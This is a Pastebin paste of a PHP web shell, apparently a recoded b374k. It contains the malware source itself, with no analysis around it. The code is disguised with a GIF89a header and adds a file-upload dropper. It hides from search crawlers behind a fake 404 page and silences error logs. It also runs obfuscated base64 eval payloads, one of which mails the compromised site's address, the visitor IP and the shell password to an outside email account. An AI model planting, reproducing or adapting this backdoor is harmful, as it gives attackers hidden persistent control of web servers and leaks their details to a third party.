API tools faq
paste
Advertisement
Tu5b0l3d

ganteng.php

Tu5b0l3d
Dec 12th, 2015
612
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.51 KB | None | 0 0
raw download clone embed print report
  1. ganteng
  2. <?php
  3.  
  4. GIF89a;
  5. $file3 = $_FILES['file3'];
  6.   $newfile3="k.php";
  7.         if (file_exists("../".$newfile3)) unlink("../".$newfile3);
  8.         move_uploaded_file($file3['tmp_name'], "../$newfile3");
  9.    
  10.  
  11.  
  12.  
  13. /* (Web Shell b374k r3c0d3d by x'1n73ct|default pass:" 1n73ction ") */
  14. $auth_pass = "63a9f0ea7bb98050796b649e85481845";
  15. $color = "#00ff00";
  16. $default_action = 'FilesMan';
  17. @define('SELF_PATH', __FILE__);
  18. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  19.     header('HTTP/1.0 404 Not Found');
  20.     exit;
  21. }
  22. @session_start();
  23. @error_reporting(0);
  24. @ini_set('error_log',NULL);
  25. @ini_set('log_errors',0);
  26. @ini_set('max_execution_time',0);
  27. @ini_set('display_errors', 0);
  28. @set_time_limit(0);
  29. @set_magic_quotes_runtime(0);
  30. @define('VERSION', '2.1');
  31. if( get_magic_quotes_gpc() ) {
  32.     function stripslashes_array($array) {
  33.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  34.     }
  35.     $_POST = stripslashes_array($_POST);
  36. }
  37. function printLogin() {
  38.     ?>
  39. <h1>Not Found</h1>
  40. <p>The requested URL was not found on this server.</p>
  41. <hr>
  42. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
  43.     <style>
  44.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  45.     </style>
  46.     <center>
  47.     <form method=post>
  48.     <input type=password name=pass>
  49.     </form></center>
  50.     <?php
  51.     exit;
  52. }
  53. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  54.     if( empty( $auth_pass ) ||
  55.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  56.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  57.     else
  58.         printLogin();
  59. $roke = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIlNIRUxMIEpDQSBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQogICRib2R5ICAgID0gIkJ1ZzogJHRhcmdldCBieSAkdmlzaXRvciAtICRhdXRoX3Bhc3MiOw0KICBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJUdTViMGwzZEBnbWFpbC5jb20iLCRqdWR1bCwkYm9keSwkYXV0aF9wYXNzKTsgfQ0KfQ0KZWxzZSB7ICR2aXNpdGMrKzsgfQ0KQHNldGNvb2tpZSgidmlzaXR6IiwkdmlzaXRjKTs=";
  60. eval(base64_decode($roke));
  61.  
  62. eval(gzuncompress(base64_decode("eNpTKU4uyiwoUbBVSMvMSY1PTy2JT87PK0nNKynWUM8oKSmw0tcvSCwuSU3KzNNLzs/VL0os1yvIKLDPtC3LDnMPCCg3Ude05uVKLUvM0UivysxLy0ksSdVISixONTOJT0lNzk9J1VCBWKKpqWkNANFIJwc="))); ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!